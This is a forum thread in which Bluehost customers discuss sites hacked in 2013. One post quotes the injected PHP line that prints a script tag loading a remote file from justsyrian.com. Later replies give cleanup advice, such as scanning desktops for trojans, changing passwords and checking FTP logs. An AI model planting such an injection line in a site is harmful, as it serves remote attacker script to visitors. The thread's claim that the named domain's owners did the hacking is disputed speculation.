Results 1 to 8 of 8

Thread: Was your BH site hacked inserting code from justsyrian.com and mytaxhelpattorney.com?

  1. #1
    Join Date
    Dec 2012
    Posts
    8

    Default Was your BH site hacked inserting code from justsyrian.com and mytaxhelpattorney.com?

    One of my sites was somehow hacked and is calling code from justsyrian.com and mytaxhelpattorney.com which are also hosted by Bluehost.
    I was just wondering if anybody else has similar problems?

  2. #2
    Join Date
    Apr 2008
    Location
    Washington
    Posts
    47

    Default

    Yup, I was hacked by them too. See this thread for other testimonials on this case: https://drupal.org/node/2057413

    So has anyone reported these people? From what I have gathered this is a bluehost vulnerability issue. I know sometimes it's the CMS that gets hacked, but what are the odds of pretty much every case being bluehost only. Don't believe me? Do a search on the code below. Think about it, what better way to hack a host than to hack the one your the most familiar with. Why they wouldn't watch their own backs, I don't know. Maybe they are small time hackers thinking people wouldn't say much about it.

    For those curious here is the code they injected on my site:

    #b3c0a9#
    @print("<script src=\"http://justsyrian.com/images/taiyYbKM.php\" ></script>");
    #/b3c0a9#

  3. #3
    Join Date
    Mar 2006
    Location
    Florida
    Posts
    79

    Default

    How and where did you find the code? Was it appearing on the page itself?
    Lee

  4. #4
    Join Date
    Apr 2008
    Location
    Washington
    Posts
    47

    Default

    I first noticed that my template was slightly broken. My site was and is still under template remaking so I figured it was an error on my part. But then I started seeing code like "#b3c0a9#" in the bottom of the site. I checked my other sites which had the same code! I instantly knew what was going on.

    Some code was injected into the template (I removed that part) but other pieces were placed inside the Joomla admin panel which I haven't figured out. At first I considered the folks of justsyrian to be possibly innocent (as in framed) but did a further investigation on them. One of their pages mentioned wanting as many links as possible. But the real evidence is that the script link (as seen above) used to go to a blank page or in other words a restricted script. Now it shows up as a 404 page to cover their tracks. I checked their error log as seen here and found a interesting path called "justsyrian/images/css.php". Familiar? I think they were using a php script to some how hijack css files (which seem to be the affected files so far). And now you will see that that script is gone too but we now know it existed by looking in the error log. And it just so happens to have a time stamp! (06-Aug-2013) which is right around the time of when many bluehost customers got hacked with a css print statement to their site. I think we've got a case on these guys. Perhaps a warning? Even with this evidence alone we have enough probable cause to know somethings fishy here.
    Last edited by JoshLewis; 08-18-2013 at 01:13 AM.

  5. #5
    Join Date
    Jul 2013
    Posts
    13

    Default

    That's not a valid assumption to make especially since there are accounts that are not affected at all - like mine. Hacks are 99.9999% the fault of the software you install or the permissions on your folders/files.

  6. #6
    Join Date
    Apr 2008
    Location
    Washington
    Posts
    47

    Default

    Your argument is flawed. To say that everyone wasn't hacked doesn't mean that we necessarily did something wrong. It's funny that all at the same time all of my sites on bluehost got hacked all at once, but my other site on SiteGround was not hacked in the slightest bit. One might argue "the hacker didn't know about the other site?". I have links back to my personal site (the one on SiteGround) which would make it way easier to find. It is way more likely for my personal site to have been hacked than the others considering that there are less links to them and one of them isn't even referenced to the others.

    And if we take the "it's your file permissions fault" argument I installed the software via SimpleScripts which one of the test sites was almost completely fresh. I was using the latest versions of the CMS.

    Why is it that these hackers only hacked bluehost accounts? I've looked though all the hack cases involving justsyrian which only effected bluehost customers. Shall I bring up each individual case? Part of the reason I'm bringing up this case is that justsyrian.com's hosting account should be evaluated.

  7. #7
    Join Date
    Jan 2013
    Posts
    1

    Default

    99.9% of cases we see involving code injections like the one mentioned above is due to a compromised FTP account on your hosting account. How does it get compromised? Several different ways. It could have just been a brute force against all accounts on that particular server, or whomever accesses the sites via FTP has a virus, trojan or keylogger installed on their local machine. In cases like this, we always tell people to scan their local machines with at LEAST two separate virus scanners (many offer free versions such as AVG and malwarebytes that you can use in addition to what you may already have). Then to change all related passwords, using 8-12 RANDOM alphanumeric characters and include at least 1 symbol such as !,@,$,&, *, etc.

  8. #8

    Default

    First of all, the code doesn't mean that justsyrian hacked your site. More likely, justsyrian is also hacked and some code is injected to their site which is being used to call something else. It is not as simple as you imagine.

    Believe me, it is not just Bluehost that is getting hacked. I own 5-6 hosting accounts on varous hosts and have used more than 10 hosts in the last 6-7 years and I can confirm this. Some hosts react better, like helping you clean up the site etc, and that is something in my opinion Bluehost isn't helpful. Otherwise, there is nothing specifically unsecure about Bluehost - these are typical LAMP servers with cPanel and most hosts have similar setup.

    From my experience, the source of most trojens / hacking is a compromised desktop which people use to access their hosting account. Again, I run a web development firm and the first thing I ask the clients is to clean up their system, even before changing cPanel passwords. Second issue is outdated CMS like Wordpress. For every OS scripts, there are going to be known security issues and it is important that you keep it updated.

    I recommend you check your FTP logs and you are most likely to see ftp connections from dates and IPs you are not aware of. Keep your local system clean, dont save passwords on FTP clients and upgrade all scripts. Also make sure that you change all your passwords.
    Design is not just what it looks like and feels like. Design is how it works.
    Hostmonster? Get a Hostmonster Special Offer or read Hostmonster Hosting Reviews

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •